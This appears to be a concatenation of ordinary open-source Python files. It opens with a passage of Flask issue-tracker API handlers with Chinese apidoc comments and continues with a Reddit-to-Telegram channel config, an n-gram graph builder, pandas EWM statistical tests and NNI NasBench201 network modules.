@apiParam {int} chance 出现几率
@apiParam {int} level 级别
@apiParam {int} priority 优先级
@apiParam {int} system 系统
@apiParam {string} title 标题
@apiParam {string} attach 福建
@apiParam {string} description 描述
@apiParam {int} detection_chance 用户识别度
@apiParam {int} project_id 项目 ID
@apiParam {int} version 版本
@apiParam {int} creator 创建人 ID
@apiParam {int} modifier 修改人 ID
@apiParam {int} [requirement_id] 关联的 需求 ID
@apiParam {string} [tag] 标签
@apiParamExample {json} Request-Example:
{
"module_id": 340,
"handler": 93,
"issue_type": 0,
"chance": 0,
"level": 0,
"priority": 0,
"system": 4,
"title": "123",
"attach": "{\"images\":[],\"files\":[],\"videos\":[]}",
"description": "<p>test</p>",
"detection_chance": 0,
"project_id": 4,
"version": 168,
"creator": 93,
"modifier": 93,
"requirement_id": 1,
"tag": 13,14
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
(system, version, project_id, module_id, modifier, handler, issue_type,
chance, level, priority, stage, title, attach, handle_status, description,
comment, detection_chance, requirement_id, case_covered, tag) = parse_json_form('issue_modify')
ret = IssueBusiness.modify(issue_id, system, version, project_id, module_id, modifier, handler, issue_type,
chance, level, priority, stage, title, attach, handle_status, description, comment,
detection_chance, requirement_id, case_covered, tag)
return json_detail_render(ret)
# 根据id修改,删除issue
@issue.route('/<int:issue_id>', methods=['DELETE'])
def issue_delete_handler(issue_id):
"""
@api {delete} /v1/issue/{int:id} 删除 缺陷
@apiName DeleteIssue
@apiGroup 项目
@apiDescription 删除 缺陷
@apiParamExample {json} Request-Example:
-
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
ret = IssueBusiness.delete(issue_id)
return json_detail_render(ret)
# 切换issue状态
@issue.route('/handlestatus/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:handle_status')
def issue_board_status_handler(issue_id):
"""
@api {post} /v1/issue/handlestatus/{int:id} 切换 缺陷状态
@apiName ModifyIssueStatus
@apiGroup 项目
@apiDescription 切换 缺陷状态
@apiParamExample {json} Request-Example:
{
"handle_status": 1
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
handle_status = parse_json_form('handle_status')[0]
ret = IssueBusiness.status_switch(issue_id, handle_status)
return json_detail_render(ret)
# 切换issue处理人
@issue.route('/handler/<int:issue_id>', methods=['POST'])
@validation('POST:handler_switch')
@required(modify_permission)
def issue_handler_switch_handler(issue_id):
"""
@api {post} /v1/issue/handler/{int:id} 切换 缺陷处理人
@apiName ModifyIssueSwitch
@apiGroup 项目
@apiDescription 切换 缺陷处理人
@apiParamExample {json} Request-Example:
{
"handler": 11
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
handler = parse_json_form('handler_switch')
ret = IssueBusiness.handler_switch(issue_id, handler)
return json_detail_render(ret)
# 切换issue等级
@issue.route('/level/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:level_switch')
def issue_level_switch_handler(issue_id):
"""
@api {post} /v1/issue/level/{int:id} 切换 缺陷等级
@apiName ModifyIssueLevel
@apiGroup 项目
@apiDescription 切换 缺陷等级
@apiParamExample {json} Request-Example:
{
"level": 3
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
level = parse_json_form('level_switch')
ret = IssueBusiness.level_switch(issue_id, level)
return json_detail_render(ret)
# 切换issue优先级
@issue.route('/priority/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:priority_switch')
def issue_priority_switch_handler(issue_id):
"""
@api {post} /v1/issue/priority/{int:id} 切换 缺陷优先级
@apiName ModifyIssuePriority
@apiGroup 项目
@apiDescription 切换 缺陷优先级
@apiParamExample {json} Request-Example:
{
"priority": 3
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
priority = parse_json_form('priority_switch')
ret = IssueBusiness.priority_switch(issue_id, priority)
return json_detail_render(ret)
# 修改issue的comment
@issue.route('/comment/<int:issue_id>', methods=['POST'])
@validation('POST:add_comment')
@required(modify_permission)
def issue_add_comment_handler(issue_id):
"""
@api {post} /v1/issue/comment/{int:id} 切换 缺陷备注
@apiName ModifyIssueComment
@apiGroup 项目
@apiDescription 切换 缺陷备注
@apiParamExample {json} Request-Example:
{
"comment": 3
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
comment = parse_json_form('add_comment')
ret = IssueBusiness.add_comment(issue_id, comment)
return json_detail_render(ret)
# 查询issue-projectid,versionid
@issue.route('/', methods=['GET'])
def issue_query_all_handler():
"""
@api {get} /v1/issue/ 查询 issue 列表
@apiName SearchIssue
@apiGroup 项目
@apiDescription 查询 issue 列表
@apiParam {int} [projectid] 项目 ID
@apiParam {int} [versionid] 版本 ID
@apiParam {string} [creator_id] 创建人 ID,使用 ',' 分割
@apiParam {string} [handler_id] 处理人 ID,使用 ',' 分割
@apiParam {int} [title] 标题
@apiParam {string} [handle_status] 处理状态 ID,使用 ',' 分割
@apiParam {string} [module_id] 模块 ID,使用 ',' 分割
@apiParam {string} [priority] 优先级 ID,使用 ',' 分割
@apiParam {int} [page_size] 分页 页面大小
@apiparam {int} [page_index] 分页 页数
@apiParamExample {json} Request-Example:
{
"projectid": 4,
"versionid": 173,
"creator_id": "1,2,3,4",
"page_size": 1
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"attach": "{"images":[],"files":[],"videos":[]}",
"chance": 2,
"comment": "",
"creation_time": "2019-08-08 20:58:49",
"creator": [
{
"id": 96,
"name": "张宇"
}
],
"description": "",
"detection_chance": "",
"handle_status": 2,
"handler": [
{
"id": 96,
"name": "张宇"
}
],
"issue_number": "T398",
"issue_type": 1,
"issueid": 398,
"level": 1,
"modified_time": "2019-08-08 20:58:49",
"modifier": [],
"module": [
{
"id": 329,
"name": "用例二级2222"
}
],
"priority": 1,
"project_id": 4,
"rank": 12,
"reopen": 0,
"repair_time": "",
"requirement_id": "",
"requirement_title": "",
"stage": "",
"status": 0,
"system": "",
"test_time": "",
"title": "1.2.7issuse55555",
"version": [
{
"id": 173,
"name": "1.2.7"
}
],
"weight": ""
}
],
"message": "ok",
"page_index": 1,
"page_size": 1,
"total": 8
}
"""
requirement_id = request.args.get('requirement_id')
if requirement_id:
page_size, page_index = parse_list_args2()
data, count = IssueBusiness.paginate_data_by_rid(page_size, page_index, requirement_id)
return json_list_render2(0, data, page_size, page_index, count)
else:
page_size, page_index = parse_list_args2()
data, count = IssueBusiness.paginate_data(page_size, page_index)
return json_list_render2(0, data, page_size, page_index, count)
# 查询issue历史记录
@issue.route('/record', methods=['GET'])
def issue_record_query_all_handler():
"""
@api {get} /v1/issue/record 查询 缺陷历史记录列表
@apiName GetIssueRecordList
@apiGroup 项目
@apiDescription 查询 缺陷历史记录列表
@apiParam {int} projectid 项目 ID
@apiParam {int} versionid 版本 ID
@apiParamExample {json} Request-Example:
?projectid=1
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"attach": "{"images":[],"files":[],"videos":[]}",
"chance": 0,
"comment": "",
"creation_time": "2019-05-10 16:23:28",
"creator": [
{
"id": 12,
"name": "刘焕焕"
}
],
"description": "<p>分享微信不成功.</p>",
"detection_chance": 0,
"handle_status": 1,
"handler": [
{
"id": 12,
"name": "刘焕焕"
}
],
"issue_number": "T309",
"issue_type": 0,
"issueid": 309,
"level": 1,
"modified_time": "2019-05-13 13:02:45",
"modifier": [],
"module": [
{
"id": 291,
"name": "V2.4.9版本用例飞科"
}
],
"priority": 1,
"project_id": 1,
"rank": 20,
"reopen": 0,
"repair_time": "",
"requirement_id": "",
"requirement_title": "",
"stage": "",
"status": 0,
"system": 1,
"test_time": "",
"title": "分享微信不成功",
"version": [
{
"id": 128,
"name": "V2.4.9"
}
],
"weight": ""
}
],
"message": "ok"
}
"""
data = IssueRecordBusiness.query_all_json()
return json_detail_render(0, data)
# 查询issue历史记录详情
@issue.route('/record/detail/<int:issue_id>', methods=['GET'])
def issue_record_detail_handler(issue_id):
"""
@api {get} /v1/issue/record/detail/{int:issue_id} 查询 缺陷历史记录详情
@apiName GetIssueRecordDetailById
@apiGroup 项目
@apiDescription 查询 缺陷历史记录详情
@apiParamExample {json} Request-Example:
-
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"modified_time": "2018-12-19 14:59:34",
"modifier_id": 1,
"modifier_name": "王金龙",
"operation": "修改了处理状态 待办 为 处理中"
},
{
"modified_time": "2018-12-18 20:28:39",
"modifier_id": 1,
"modifier_name": "王金龙",
"operation": "创建了BUG title"
}
],
"message": "ok"
}
"""
data = IssueRecordBusiness.query_record_detail(issue_id)
return json_detail_render(0, data)
# 根据id查询issue
@issue.route('/<int:issue_id>', methods=['GET'])
def issue_query_handler(issue_id):
"""
@api {get} /v1/issue/{int:issue_id} 查询 缺陷详情 (id)
@apiName GetIssueById
@apiGroup 项目
@apiDescription 查询 缺陷详情 通过 ID
@apiParamExample {json} Request-Example:
-
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code":0,
"data":[
{
"attach":"attach",
"chance":1,
"comment":"",
"creation_time":"2018-12-18 20:28:39",
"creator":[
{
"id":1,
"name":"王金龙"
}
],
"description":"description",
"handle_status":3,
"handler":[
{
"id":1,
"name":"王金龙"
}
],
"issue_number":"T1",
"issue_type":1,
"issueid":1,
"level":1,
"modified_time":"2019-03-01 16:46:10",
"modifier":[
{
"id":1,
"name":"王金龙"
}
],
"module":[
{
"id":1,
"name":"音频"
}
],
"priority":1,
"project_id":1,
"reopen":0,
"repair_time":"0:00:05",
"requirement_id":"",
"requirement_title":"",
"stage":1,
"status":0,
"system":0,
"test_time":"2 days, 20:21:05",
"title":"title",
"version":[
{
"id":1,
"name":"str"
}
],
"weight":""
}
],
"message":"ok"
}
"""
data = IssueBusiness.query_by_id(issue_id)
return json_detail_render(0, data)
# issue关闭和打开的dashboard
@issue.route('/dashboard', methods=['POST'])
@required(view_permission)
@validation('POST:issue_dashboard')
def issue_dashboard_work_handler():
start_date, end_date = parse_json_form('issue_dashboard')
data = IssueDashBoardBusiness.issue_dashboard(start_date, end_date)
return json_detail_render(0, data)
# 查询测试人员每天创建的issue个数
@issue.route('/dashboard/tester', methods=['POST'])
@required(view_permission)
@validation('POST:issue_dashboard')
def tester_issue_work_handler():
start_date, end_date = parse_json_form('issue_dashboard')
data = IssueDashBoardBusiness.issue_all_tester_dashboard(start_date, end_date)
return json_detail_render(0, data)
# issue的状态分布和优先级分布
@issue.route('/dashboard/project', methods=['POST'])
@required(view_permission)
@validation('POST:issue_dashboard')
def issue_project_dashboard_handler():
"""
@api {POST} /v1/issue/dashboard/project 查询 缺陷状态分布和优先级分布
@apiName GetIssueByStatusAndPriority
@apiGroup 项目
@apiDescription 查询 缺陷状态分布和优先级分布
@apiParamExample {json} Request-Example:
{
"start_date": "2019-01-02 10:10:11",
"end_date": "2019-01-03 10:10:12",
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"modified_time": "2018-12-19 14:59:34",
"modifier_id": 1,
"modifier_name": "王金龙",
"operation": "修改了处理状态 待办 为 处理中"
},
{
"modified_time": "2018-12-18 20:28:39",
"modifier_id": 1,
"modifier_name": "王金龙",
"operation": "创建了BUG title"
}
],
"message": "ok"
}
"""
start_date, end_date = parse_json_form('issue_dashboard')
data = IssueDashBoardBusiness.issue_project_dashboard(start_date, end_date)
return json_detail_render(0, data)
# 看板根据pro_id查询issue各个状态的数量
@issue.route('/dashboard/project/<int:pro_id>', methods=['GET'])
def issue_query_pro_handler(pro_id):
"""
@api {post} /v1/issue/dashboard/project/{int:project_id} 查询 看板缺陷 根据 project ID
@apiName GetBoardIssueByProjectId
@apiGroup 项目
@apiDescription 根据 project ID 查询 看板缺陷
@apiParamExample {json} Request-Example:
-
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code":0,
"data":[
{
"info":[
{
"detail":[
{
"count":1,
"handle_status":1
},
{
"count":1,
"handle_status":2
},
{
"count":1,
"handle_status":3
}
],
"total":3,
"version":1
},
{
"detail":[
{
"count":1,
"handle_status":4
}
],
"total":1,
"version":2
},
{
"detail":[
{
"count":1,
"handle_status":1
}
],
"total":1,
"version":3
},
{
"detail":[
{
"count":3,
"handle_status":4
}
],
"total":3,
"version":4
},
{
"detail":[
{
"count":1,
"handle_status":1
},
{
"count":1,
"handle_status":4
}
],
"total":2,
"version":128
}
],
"project_id":1
}
],
"message":"ok"
}
"""
data = IssueDashBoardBusiness.issue_project_id_dashboard(pro_id)
return json_detail_render(0, data)
# 绑定 issue 到 requirement
@issue.route('/bind/requirement', methods=['POST'])
@required(modify_permission)
@validation('POST:issue_bind_requirement')
def issue_bind_requirement():
"""
@api {post} /v1/issue/bind/requirement 绑定 缺陷 issue 到 需求 requirement
@apiName IssueBindRequirement
@apiGroup 项目
@apiDescription 绑定 缺陷到需求
@apiParam {int} issue_id 缺陷 ID
@apiParam {int} requirement_id 需求 ID
@apiParamExample {json} Request-Example:
{
"issue": 11,
"requirement_id": 22
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
requirement_id, issue_id = parse_json_form('issue_bind_requirement')
ret, msg = IssueBusiness.issue_bind_requirement(issue_id, requirement_id)
return json_detail_render(ret, [], msg)
# 导出 issue 列表
@issue.route('/export', methods=['GET'])
def issue_export():
"""
@api {get} /v1/issue/ 导出 issue 到 xls
@apiName IssueExportToXls
@apiGroup 项目
@apiDescription 导出 issue 到 xls
@apiParam {int} [projectid] 项目 ID
@apiParam {int} [versionid] 版本 ID
@apiParam {int} [creator_id] 创建人 ID
@apiParam {int} [title] 标题
@apiParam {int} [handle_status] 处理状态 ID
@apiParam {int} [module_id] 模块 ID
@apiParam {int} [priority] 优先级 ID
@apiParam {int} [page_size] 分页 页面大小
@apiparam {int} [page_index] 分页 页数
@apiParamExample {json} Request-Example:
{
"projectid": 4,
"versionid": 173,
"page_size": 1
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": "http://tcloud-static.oss-cn-beijing.aliyuncs.com/issue_export/0/Issues-20190809.164431.xls",
"message": "ok"
}
"""
issue_url = IssueBusiness.export()
return json_detail_render(code=0, data=issue_url)
|
reddit2telegram/channels/news/app.py | mainyordle/reddit2telegram | 187 | 10323 | #encoding:utf-8
from utils import weighted_random_subreddit
t_channel = '@news756'
subreddit = weighted_random_subreddit({
'politics': 0.5,
'news': 0.5
})
def send_post(submission, r2t):
return r2t.send_simple(submission,
text='{title}\n\n{self_text}\n\n/r/{subreddit_name}\n{short_link}',
gif='{title}\n\n/r/{subreddit_name}\n{short_link}',
img='{title}\n\n/r/{subreddit_name}\n{short_link}',
album='{title}\n{link}\n\n/r/{subreddit_name}\n{short_link}',
other='{title}\n{link}\n\n/r/{subreddit_name}\n{short_link}'
)
|
source/documentModel/representations/DocumentNGramSymWinGraph.py | Vyvy-vi/Ngram-Graphs | 178 | 10333 | <gh_stars>100-1000
"""
DocumentNGramSymWinGraph.py
Created on May 23, 2017, 4:56 PM
"""
import networkx as nx
import pygraphviz as pgv
import matplotlib.pyplot as plt
from networkx.drawing.nx_agraph import graphviz_layout
from DocumentNGramGraph import DocumentNGramGraph
class DocumentNGramSymWinGraph(DocumentNGramGraph):
# an extension of DocumentNGramGraph
# for symmetric windowing
def buildGraph(self,verbose = False, d=[]):
# set Data @class_variable
self.setData(d)
Data = self._Data
# build ngram
ng = self.build_ngram()
s = len(ng)
# calculate window
win = self._Dwin//2
# initialize graph
self._Graph = nx.Graph()
if(s>=2 and win>=1):
# max possible window size (bounded by win)
o = min(win,s)+1
window = ng[1:o]
i = o
# first build the full window
for gram in ng[0:s-1]:
for w in window:
self.addEdgeInc(gram,w)
window.pop(0)
# if window's edge has reached
# it's the limit of ng stop
# appending
if i<s:
window.append(ng[i][:])
i+=1
# print Graph (optional)
if verbose:
self.GraphDraw(self._GPrintVerbose)
return self._Graph
|
venv/Lib/site-packages/pandas/tests/window/moments/test_moments_consistency_ewm.py | ajayiagbebaku/NFL-Model | 28,899 | 10345 | import numpy as np
import pytest
from pandas import (
DataFrame,
Series,
concat,
)
import pandas._testing as tm
@pytest.mark.parametrize("func", ["cov", "corr"])
def test_ewm_pairwise_cov_corr(func, frame):
result = getattr(frame.ewm(span=10, min_periods=5), func)()
result = result.loc[(slice(None), 1), 5]
result.index = result.index.droplevel(1)
expected = getattr(frame[1].ewm(span=10, min_periods=5), func)(frame[5])
tm.assert_series_equal(result, expected, check_names=False)
@pytest.mark.parametrize("name", ["cov", "corr"])
def test_ewm_corr_cov(name):
A = Series(np.random.randn(50), index=np.arange(50))
B = A[2:] + np.random.randn(48)
A[:10] = np.NaN
B[-10:] = np.NaN
result = getattr(A.ewm(com=20, min_periods=5), name)(B)
assert np.isnan(result.values[:14]).all()
assert not np.isnan(result.values[14:]).any()
@pytest.mark.parametrize("min_periods", [0, 1, 2])
@pytest.mark.parametrize("name", ["cov", "corr"])
def test_ewm_corr_cov_min_periods(name, min_periods):
# GH 7898
A = Series(np.random.randn(50), index=np.arange(50))
B = A[2:] + np.random.randn(48)
A[:10] = np.NaN
B[-10:] = np.NaN
result = getattr(A.ewm(com=20, min_periods=min_periods), name)(B)
# binary functions (ewmcov, ewmcorr) with bias=False require at
# least two values
assert np.isnan(result.values[:11]).all()
assert not np.isnan(result.values[11:]).any()
# check series of length 0
empty = Series([], dtype=np.float64)
result = getattr(empty.ewm(com=50, min_periods=min_periods), name)(empty)
tm.assert_series_equal(result, empty)
# check series of length 1
result = getattr(Series([1.0]).ewm(com=50, min_periods=min_periods), name)(
Series([1.0])
)
tm.assert_series_equal(result, Series([np.NaN]))
@pytest.mark.parametrize("name", ["cov", "corr"])
def test_different_input_array_raise_exception(name):
A = Series(np.random.randn(50), index=np.arange(50))
A[:10] = np.NaN
msg = "other must be a DataFrame or Series"
# exception raised is Exception
with pytest.raises(ValueError, match=msg):
getattr(A.ewm(com=20, min_periods=5), name)(np.random.randn(50))
def create_mock_weights(obj, com, adjust, ignore_na):
if isinstance(obj, DataFrame):
if not len(obj.columns):
return DataFrame(index=obj.index, columns=obj.columns)
w = concat(
[
create_mock_series_weights(
obj.iloc[:, i], com=com, adjust=adjust, ignore_na=ignore_na
)
for i, _ in enumerate(obj.columns)
],
axis=1,
)
w.index = obj.index
w.columns = obj.columns
return w
else:
return create_mock_series_weights(obj, com, adjust, ignore_na)
def create_mock_series_weights(s, com, adjust, ignore_na):
w = Series(np.nan, index=s.index)
alpha = 1.0 / (1.0 + com)
if adjust:
count = 0
for i in range(len(s)):
if s.iat[i] == s.iat[i]:
w.iat[i] = pow(1.0 / (1.0 - alpha), count)
count += 1
elif not ignore_na:
count += 1
else:
sum_wts = 0.0
prev_i = -1
count = 0
for i in range(len(s)):
if s.iat[i] == s.iat[i]:
if prev_i == -1:
w.iat[i] = 1.0
else:
w.iat[i] = alpha * sum_wts / pow(1.0 - alpha, count - prev_i)
sum_wts += w.iat[i]
prev_i = count
count += 1
elif not ignore_na:
count += 1
return w
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
def test_ewm_consistency_mean(consistency_data, adjust, ignore_na, min_periods):
x, is_constant, no_nans = consistency_data
com = 3.0
result = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
weights = create_mock_weights(x, com=com, adjust=adjust, ignore_na=ignore_na)
expected = (
x.multiply(weights).cumsum().divide(weights.cumsum()).fillna(method="ffill")
)
expected[
x.expanding().count() < (max(min_periods, 1) if min_periods else 1)
] = np.nan
tm.assert_equal(result, expected.astype("float64"))
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
def test_ewm_consistency_consistent(consistency_data, adjust, ignore_na, min_periods):
x, is_constant, no_nans = consistency_data
com = 3.0
if is_constant:
count_x = x.expanding().count()
mean_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
# check that correlation of a series with itself is either 1 or NaN
corr_x_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).corr(x)
exp = x.max() if isinstance(x, Series) else x.max().max()
# check mean of constant series
expected = x * np.nan
expected[count_x >= max(min_periods, 1)] = exp
tm.assert_equal(mean_x, expected)
# check correlation of constant series with itself is NaN
expected[:] = np.nan
tm.assert_equal(corr_x_x, expected)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
def test_ewm_consistency_var_debiasing_factors(
consistency_data, adjust, ignore_na, min_periods
):
x, is_constant, no_nans = consistency_data
com = 3.0
# check variance debiasing factors
var_unbiased_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=False)
var_biased_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=True)
weights = create_mock_weights(x, com=com, adjust=adjust, ignore_na=ignore_na)
cum_sum = weights.cumsum().fillna(method="ffill")
cum_sum_sq = (weights * weights).cumsum().fillna(method="ffill")
numerator = cum_sum * cum_sum
denominator = numerator - cum_sum_sq
denominator[denominator <= 0.0] = np.nan
var_debiasing_factors_x = numerator / denominator
tm.assert_equal(var_unbiased_x, var_biased_x * var_debiasing_factors_x)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_moments_consistency_var(
consistency_data, adjust, ignore_na, min_periods, bias
):
x, is_constant, no_nans = consistency_data
com = 3.0
mean_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
assert not (var_x < 0).any().any()
if bias:
# check that biased var(x) == mean(x^2) - mean(x)^2
mean_x2 = (
(x * x)
.ewm(com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na)
.mean()
)
tm.assert_equal(var_x, mean_x2 - (mean_x * mean_x))
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_moments_consistency_var_constant(
consistency_data, adjust, ignore_na, min_periods, bias
):
x, is_constant, no_nans = consistency_data
com = 3.0
if is_constant:
count_x = x.expanding(min_periods=min_periods).count()
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
# check that variance of constant series is identically 0
assert not (var_x > 0).any().any()
expected = x * np.nan
expected[count_x >= max(min_periods, 1)] = 0.0
if not bias:
expected[count_x < 2] = np.nan
tm.assert_equal(var_x, expected)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_ewm_consistency_std(consistency_data, adjust, ignore_na, min_periods, bias):
x, is_constant, no_nans = consistency_data
com = 3.0
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
std_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).std(bias=bias)
assert not (var_x < 0).any().any()
assert not (std_x < 0).any().any()
# check that var(x) == std(x)^2
tm.assert_equal(var_x, std_x * std_x)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_ewm_consistency_cov(consistency_data, adjust, ignore_na, min_periods, bias):
x, is_constant, no_nans = consistency_data
com = 3.0
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
assert not (var_x < 0).any().any()
cov_x_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).cov(x, bias=bias)
assert not (cov_x_x < 0).any().any()
# check that var(x) == cov(x, x)
tm.assert_equal(var_x, cov_x_x)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_ewm_consistency_series_cov_corr(
consistency_data, adjust, ignore_na, min_periods, bias
):
x, is_constant, no_nans = consistency_data
com = 3.0
if isinstance(x, Series):
var_x_plus_y = (
(x + x)
.ewm(com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na)
.var(bias=bias)
)
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
var_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
cov_x_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).cov(x, bias=bias)
# check that cov(x, y) == (var(x+y) - var(x) -
# var(y)) / 2
tm.assert_equal(cov_x_y, 0.5 * (var_x_plus_y - var_x - var_y))
# check that corr(x, y) == cov(x, y) / (std(x) *
# std(y))
corr_x_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).corr(x, bias=bias)
std_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).std(bias=bias)
std_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).std(bias=bias)
tm.assert_equal(corr_x_y, cov_x_y / (std_x * std_y))
if bias:
# check that biased cov(x, y) == mean(x*y) -
# mean(x)*mean(y)
mean_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
mean_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
mean_x_times_y = (
(x * x)
.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
)
.mean()
)
tm.assert_equal(cov_x_y, mean_x_times_y - (mean_x * mean_y))
|
nni/retiarii/hub/pytorch/nasbench201.py | nbl97/nni | 2,305 | 10349 | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from typing import Callable, Dict
import torch
import torch.nn as nn
from nni.retiarii import model_wrapper
from nni.retiarii.nn.pytorch import NasBench201Cell
__all__ = ['NasBench201']
OPS_WITH_STRIDE = {
'none': lambda C_in, C_out, stride: Zero(C_in, C_out, stride),
'avg_pool_3x3': lambda C_in, C_out, stride: Pooling(C_in, C_out, stride, 'avg'),
'max_pool_3x3': lambda C_in, C_out, stride: Pooling(C_in, C_out, stride, 'max'),
'conv_3x3': lambda C_in, C_out, stride: ReLUConvBN(C_in, C_out, (3, 3), (stride, stride), (1, 1), (1, 1)),
'conv_1x1': lambda C_in, C_out, stride: ReLUConvBN(C_in, C_out, (1, 1), (stride, stride), (0, 0), (1, 1)),
'skip_connect': lambda C_in, C_out, stride: nn.Identity() if stride == 1 and C_in == C_out
else FactorizedReduce(C_in, C_out, stride),
}
PRIMITIVES = ['none', 'skip_connect', 'conv_1x1', 'conv_3x3', 'avg_pool_3x3']
class ReLUConvBN(nn.Module):
def __init__(self, C_in, C_out, kernel_size, stride, padding, dilation):
super(ReLUConvBN, self).__init__()
self.op = nn.Sequential(
nn.ReLU(inplace=False),
nn.Conv2d(C_in, C_out, kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=False),
nn.BatchNorm2d(C_out)
)
def forward(self, x):
return self.op(x)
class SepConv(nn.Module):
def __init__(self, C_in, C_out, kernel_size, stride, padding, dilation):
super(SepConv, self).__init__()
self.op = nn.Sequential(
nn.ReLU(inplace=False),
nn.Conv2d(C_in, C_in, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, groups=C_in, bias=False),
nn.Conv2d(C_in, C_out, kernel_size=1, padding=0, bias=False),
nn.BatchNorm2d(C_out),
)
def forward(self, x):
return self.op(x)
class Pooling(nn.Module):
def __init__(self, C_in, C_out, stride, mode):
super(Pooling, self).__init__()
if C_in == C_out:
self.preprocess = None
else:
self.preprocess = ReLUConvBN(C_in, C_out, 1, 1, 0, 1)
if mode == 'avg':
self.op = nn.AvgPool2d(3, stride=stride, padding=1, count_include_pad=False)
elif mode == 'max':
self.op = nn.MaxPool2d(3, stride=stride, padding=1)
else:
raise ValueError('Invalid mode={:} in Pooling'.format(mode))
def forward(self, x):
if self.preprocess:
x = self.preprocess(x)
return self.op(x)
class Zero(nn.Module):
def __init__(self, C_in, C_out, stride):
super(Zero, self).__init__()
self.C_in = C_in
self.C_out = C_out
self.stride = stride
self.is_zero = True
def forward(self, x):
if self.C_in == self.C_out:
if self.stride == 1:
return x.mul(0.)
else:
return x[:, :, ::self.stride, ::self.stride].mul(0.)
else:
shape = list(x.shape)
shape[1] = self.C_out
zeros = x.new_zeros(shape, dtype=x.dtype, device=x.device)
return zeros
class FactorizedReduce(nn.Module):
def __init__(self, C_in, C_out, stride):
super(FactorizedReduce, self).__init__()
self.stride = stride
self.C_in = C_in
self.C_out = C_out
self.relu = nn.ReLU(inplace=False)
if stride == 2:
C_outs = [C_out // 2, C_out - C_out // 2]
self.convs = nn.ModuleList()
for i in range(2):
self.convs.append(nn.Conv2d(C_in, C_outs[i], 1, stride=stride, padding=0, bias=False))
self.pad = nn.ConstantPad2d((0, 1, 0, 1), 0)
else:
raise ValueError('Invalid stride : {:}'.format(stride))
self.bn = nn.BatchNorm2d(C_out)
def forward(self, x):
x = self.relu(x)
y = self.pad(x)
out = torch.cat([self.convs[0](x), self.convs[1](y[:, :, 1:, 1:])], dim=1)
out = self.bn(out)
return out
